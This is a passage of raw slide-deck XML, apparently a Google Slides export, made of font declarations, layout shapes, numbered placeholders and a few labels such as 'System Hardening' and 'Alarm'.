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05" r:id="rId2"/>
    <p:sldMasterId id="2147483727" r:id="rId3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId3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24377650" cy="13716000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Amatic SC" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Helvetica Neue" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId34"/>
      <p:bold r:id="rId35"/>
      <p:italic r:id="rId36"/>
      <p:boldItalic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inconsolata" pitchFamily="1" charset="0"/>
      <p:regular r:id="rId38"/>
      <p:bold r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato Light" panose="020F0502020204030203"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boto Black" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:bold r:id="rId48"/>
      <p:boldItalic r:id="rId49"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId50"/>
      <p:bold r:id="rId51"/>
      <p:italic r:id="rId52"/>
      <p:boldItalic r:id="rId53"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId54"/>
      <p:bold r:id="rId55"/>
      <p:italic r:id="rId56"/>
      <p:boldItalic r:id="rId57"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin"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iHTAVLq+FVj2w71llB2CUilIU5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76892F-4A5C-4B29-B97E-A2BCD0243B9D}">
  <a:tblStyle styleId="{AB76892F-4A5C-4B29-B97E-A2BCD0243B9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8" d="100"/>
          <a:sy n="38" d="100"/>
        </p:scale>
        <p:origin x="43" y="24"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide pos="958"/>
        <p:guide orient="horz" pos="8160"/>
        <p:guide orient="horz" pos="480"/>
        <p:guide pos="14398"/>
        <p:guide orient="horz" pos="3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customschemas.google.com/relationships/presentationmetadata" Target="metadata"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font30.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0.fntdata"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font2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2pPr>
            <a:lvl3pPr marL="1371600" marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marL="1828800" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="2286000" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="2743200" marR="0" lvl="5"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p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6" name="Google Shape;231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p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8" name="Google Shape;23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1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7" name="Google Shape;240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Google Shape;2415;p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6" name="Google Shape;2416;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p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5" name="Google Shape;24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p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5" name="Google Shape;243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p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3" name="Google Shape;244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p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1" name="Google Shape;245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f9c6693cea_2_1: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9" name="Google Shape;2459;gf9c6693cea_2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f9c6693cea_2_9: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8" name="Google Shape;2468;gf9c6693cea_2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f9c6693cea_2_25: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6" name="Google Shape;2476;gf9c6693cea_2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3" name="Google Shape;232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4" name="Google Shape;232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f9c6693cea_2_42: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4" name="Google Shape;2484;gf9c6693cea_2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f9c6693cea_2_51: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f9c6693cea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f9c6693cea_2_62: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2" name="Google Shape;2502;gf9c6693cea_2_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p1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2" name="Google Shape;251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p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0" name="Google Shape;2520;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f9c6693cea_2_73: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7" name="Google Shape;2527;gf9c6693cea_2_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f9c6693cea_2_79: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4" name="Google Shape;2534;gf9c6693cea_2_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p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1" name="Google Shape;2541;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5" name="Google Shape;233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p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3" name="Google Shape;234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p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1" name="Google Shape;235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p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9" name="Google Shape;235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p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7" name="Google Shape;236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p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9" name="Google Shape;237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p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0" name="Google Shape;239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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Google Shape;12;p2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 name="Google Shape;13;p2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000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>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 name="Google Shape;14;p2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06"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107" name="Google Shape;107;p3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35"/>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9" name="Google Shape;109;p3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3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75"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1676" name="Google Shape;1676;p123"/>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77" name="Google Shape;1677;p123"/>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678" name="Google Shape;1678;p123"/>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679" name="Google Shape;1679;p12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80" name="Google Shape;1680;p123"/>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681" name="Google Shape;1681;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82" name="Google Shape;1682;p123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143481" y="10328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3" name="Google Shape;1683;p123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219475" y="10328151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1684" name="Google Shape;1684;p123"/>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07</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1685" name="Google Shape;1685;p123"/>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6" name="Google Shape;1686;p123"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32257" y="10328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87" name="Google Shape;1687;p123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143181" y="11496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8" name="Google Shape;1688;p123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219175" y="11496427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1689" name="Google Shape;1689;p12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08</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1690" name="Google Shape;1690;p12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1" name="Google Shape;1691;p123"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32192" y="11496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92" name="Google Shape;1692;p123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143348" y="7991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3" name="Google Shape;1693;p123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219342" y="7991151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1694" name="Google Shape;1694;p123"/>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05</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1695" name="Google Shape;1695;p123"/>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6" name="Google Shape;1696;p123"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32391" y="7991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97" name="Google Shape;1697;p123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143048" y="9159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8" name="Google Shape;1698;p123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219042" y="9159427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1699" name="Google Shape;1699;p123"/>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06</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1700" name="Google Shape;1700;p123"/>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1" name="Google Shape;1701;p123"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="9159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02" name="Google Shape;1702;p123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143415" y="5694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3" name="Google Shape;1703;p123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219408" y="5694151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1704" name="Google Shape;1704;p123"/>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03</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1705" name="Google Shape;1705;p123"/>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6" name="Google Shape;1706;p123"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="5694333"/>
            <a:ext cx="236465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07" name="Google Shape;1707;p123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143115" y="6862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8" name="Google Shape;1708;p123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219108" y="6862427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1709" name="Google Shape;1709;p12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04</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1710" name="Google Shape;1710;p12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1" name="Google Shape;1711;p123"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="6862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12" name="Google Shape;1712;p123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143281" y="3357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3" name="Google Shape;1713;p123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219275" y="3357151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1714" name="Google Shape;1714;p123"/>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01</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1715" name="Google Shape;1715;p123"/>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6" name="Google Shape;1716;p123"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="3357333"/>
            <a:ext cx="236465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17" name="Google Shape;1717;p123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3142981" y="4525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8" name="Google Shape;1718;p123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218975" y="4525427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1719" name="Google Shape;1719;p123"/>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02</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1720" name="Google Shape;1720;p123"/>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1" name="Google Shape;1721;p123"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4525667"/>
            <a:ext cx="236465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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1723" name="Google Shape;1723;p124"/>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24" name="Google Shape;1724;p124"/>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25" name="Google Shape;1725;p124"/>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726" name="Google Shape;1726;p12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27" name="Google Shape;1727;p124"/>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728" name="Google Shape;172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729" name="Google Shape;1729;p124"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218833" y="3586941"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1730" name="Google Shape;1730;p1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01</a:t>
              </a:r>
              <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1731" name="Google Shape;1731;p124"/>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2" name="Google Shape;1732;p124"/>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24"/>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734" name="Google Shape;1734;p124"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8811455" y="3586941"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1735" name="Google Shape;1735;p1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02</a:t>
              </a:r>
              <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1736" name="Google Shape;1736;p124"/>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7" name="Google Shape;1737;p124"/>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24"/>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739" name="Google Shape;1739;p124"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="16353290" y="3588941"/>
            <a:ext cx="1421954" cy="1422613"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1740" name="Google Shape;1740;p1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03</a:t>
              </a:r>
              <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1741" name="Google Shape;1741;p124"/>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2" name="Google Shape;1742;p124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="17065369"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24"/>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44"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1745" name="Google Shape;1745;p125"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11427090" y="1732400"/>
            <a:ext cx="2205958" cy="10973966"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1746" name="Google Shape;1746;p125"/>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47" name="Google Shape;1747;p125"/>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748" name="Google Shape;1748;p12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49" name="Google Shape;1749;p125"/>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750" name="Google Shape;1750;p12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51" name="Google Shape;1751;p125"/>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52" name="Google Shape;1752;p125"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>System Hardening</a:t>
            </a:r>
            <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1753" name="Google Shape;1753;p125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="13523062"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25"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Alarm</a:t>
            </a:r>
            <a:endParaRPr sz="5600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1755" name="Google Shape;1755;p125"/>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25"/>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57"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1758" name="Google Shape;1758;p126"/>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59" name="Google Shape;1759;p126"/>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60" name="Google Shape;1760;p126"/>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761" name="Google Shape;1761;p12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62" name="Google Shape;1762;p126"/>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763" name="Google Shape;1763;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64" name="Google Shape;1764;p126"/>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01</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1765" name="Google Shape;1765;p126"/>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26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3021813" y="3404200"/>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26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1218756"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26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2335417" y="5233000"/>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26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21152891" y="51694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02</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1770" name="Google Shape;1770;p126"/>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03</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1771" name="Google Shape;1771;p126"/>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26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3022829" y="7056600"/>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26"/>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26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2487776" y="9088600"/>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26"/>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04</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1776" name="Google Shape;1776;p126"/>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05</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1777" name="Google Shape;1777;p126"/>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26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3022829" y="10984633"/>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26"/>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80" name="Google Shape;1780;p126"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="5186567"/>
            <a:ext cx="24377701" cy="1575300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
